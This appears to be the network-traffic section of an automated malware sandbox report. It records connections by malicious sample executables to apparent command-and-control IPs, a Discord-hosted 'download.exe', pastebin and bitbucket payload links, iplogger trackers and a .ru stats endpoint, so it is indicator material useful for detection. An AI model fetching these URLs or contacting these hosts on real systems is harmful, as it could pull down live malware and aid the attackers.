                  Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net www.atlassian.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-E1r+NLR3AaVi9LMkBbTnxQ=='; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  X-Usage-Quota-Remaining: 998191.117
                  X-Usage-Request-Cost: 1839.10
                  X-Usage-User-Time: 0.047252
                  X-Usage-System-Time: 0.007921
                  X-Usage-Input-Ops: 0
                  X-Usage-Output-Ops: 0
                  Cache-Control: max-age=900
                  Age: 0
                  X-Cache: MISS
                  X-Content-Type-Options: nosniff
                  X-Xss-Protection: 1; mode=block
                  Atl-Traceid: 142c728889704105b282c1636ca046de
                  Atl-Request-Id: 142c7288-8970-4105-b282-c1636ca046de
                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                  Server-Timing: atl-edge;dur=192,atl-edge-internal;dur=2,atl-edge-upstream;dur=191,atl-edge-pop;desc="aws-eu-west-1"
                • flag-us
                  DNS
                  vsblobprodscussu5shard20.blob.core.windows.net
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  vsblobprodscussu5shard20.blob.core.windows.net
                  IN A
                  Response
                  vsblobprodscussu5shard20.blob.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.store.core.windows.net
                  blob.sat09prdstrz08a.store.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.trafficmanager.net
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.70.36
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.38.228
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.79.68
                • flag-us
                  GET
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  patch.exe
                  Remote address:
                  20.150.70.36:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard20.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 503808
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8DC23A6A7A80D5E"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: cc23e721-b01e-0060-7c38-30a9b0000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:20 GMT
                • flag-us
                  GET
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  patch.exe
                  Remote address:
                  20.150.70.36:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard20.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 503808
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8DC23A6A7A80D5E"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: cc23ee48-b01e-0060-5b38-30a9b0000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:22 GMT
                • flag-us
                  DNS
                  dumancue.com
                  regsvr32.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  dumancue.com
                  IN A
                  Response
                • 212.193.30.45:80
                  http://212.193.30.45/proxies.txt
                  http
                  Mon166dc6040fb8726.exe
                  371 B
                  962 B
                  6
                  4

                  HTTP Request

                  GET http://212.193.30.45/proxies.txt

                  HTTP Response

                  301
                • 212.193.30.45:443
                  tls
                  Mon166dc6040fb8726.exe
                  325 B
                  219 B
                  5
                  5
                • 212.193.30.45:443
                  tls
                  Mon166dc6040fb8726.exe
                  334 B
                  219 B
                  6
                  5
                • 212.193.30.29:80
                  Mon166dc6040fb8726.exe
                  152 B
                  3
                • 52.203.72.196:443
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  152 B
                  120 B
                  3
                  3
                • 208.95.112.1:80
                  http://ip-api.com/json/
                  http
                  Mon1618e4439d986270.exe
                  728 B
                  558 B
                  5
                  2

                  HTTP Request

                  GET http://ip-api.com/json/

                  HTTP Response

                  200
                • 54.84.177.46:443
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 162.159.133.233:443
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  tls, http
                  Mon164c5af508c3.exe
                  6.9kB
                  37.5kB
                  64
                  53

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                • 104.26.3.46:443
                  https://iplogger.org/143up7
                  tls, http
                  Mon1631358b82299bd8.exe
                  1.2kB
                  14.5kB
                  14
                  19

                  HTTP Request

                  GET https://iplogger.org/143up7

                  HTTP Response

                  403
                • 104.26.3.46:443
                  https://iplogger.org/1Brhn7
                  tls, http
                  Mon161bd381a14aea5c.exe
                  804 B
                  4.7kB
                  9
                  10

                  HTTP Request

                  GET https://iplogger.org/1Brhn7

                  HTTP Response

                  200
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                  3
                • 104.26.3.46:443
                  https://iplogger.org/1Bthn7
                  tls, http
                  Mon161bd381a14aea5c.exe
                  1.0kB
                  13.5kB
                  14
                  19

                  HTTP Request

                  GET https://iplogger.org/1Bthn7

                  HTTP Response

                  403
                • 142.250.187.227:80
                  http://c.pki.goog/r/r4.crl
                  http
                  Mon1631358b82299bd8.exe
                  560 B
                  5.0kB
                  7
                  6

                  HTTP Request

                  GET http://c.pki.goog/r/gsr1.crl

                  HTTP Response

                  200

                  HTTP Request

                  GET http://c.pki.goog/r/r4.crl

                  HTTP Response

                  200
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 172.67.19.24:443
                  https://pastebin.com/raw/A7dSG1te
                  tls, http
                  Mon166dc6040fb8726.exe
                  883 B
                  6.3kB
                  11
                  11

                  HTTP Request

                  GET https://pastebin.com/raw/A7dSG1te

                  HTTP Response

                  404
                • 104.21.5.208:80
                  http://wfsdragon.ru/api/setStats.php
                  http
                  Mon166dc6040fb8726.exe
                  374 B
                  2.1kB
                  6
                  5

                  HTTP Request

                  GET http://wfsdragon.ru/api/setStats.php

                  HTTP Response

                  404
                • 212.192.241.62:80
                  Mon166dc6040fb8726.exe
                  152 B
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 2.19.117.18:80
                  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                  http
                  399 B
                  1.7kB
                  4
                  4

                  HTTP Request

                  GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

                  HTTP Response

                  200
                • 44.221.84.105:443
                  server14.trumops.com
                  tls
                  csrss.exe
                  15.1kB
                  9.4kB
                  28
                  22
                • 204.79.197.219:443
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  tls, http
                  patch.exe
                  2.9kB
                  10.8kB
                  18
                  21

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/index2.txt

                  HTTP Response

                  404

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/index2.txt

                  HTTP Response

                  404

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

                  HTTP Response

                  302
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 20.150.38.228:443
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  tls, http
                  patch.exe
                  357.3kB
                  18.1MB
                  7474
                  13003

                  HTTP Request

                  GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26

                  HTTP Response

                  200

                  HTTP Request

                  GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26

                  HTTP Response

                  200
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 185.166.142.21:443
                  https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg
                  tls, http
                  Build.exe
                  1.2kB
                  24.1kB
                  17
                  23

                  HTTP Request

                  GET https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg

                  HTTP Response

                  404
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 72.84.118.132:8080
                  regsvr32.exe
                  152 B
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 20.150.70.36:443
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  tls, http
                  patch.exe
                  21.7kB
                  1.1MB
                  426
                  758

                  HTTP Request

                  GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c

                  HTTP Response

                  200

                  HTTP Request

                  GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c

                  HTTP Response

                  200
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  80 B
                  3
                  2
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 72.84.118.132:8080
                  regsvr32.exe
                  152 B
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                  120 B
                  3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                  120 B
                  3
                  3
                MITRE ATT&CK Enterprise v15

                Downloads
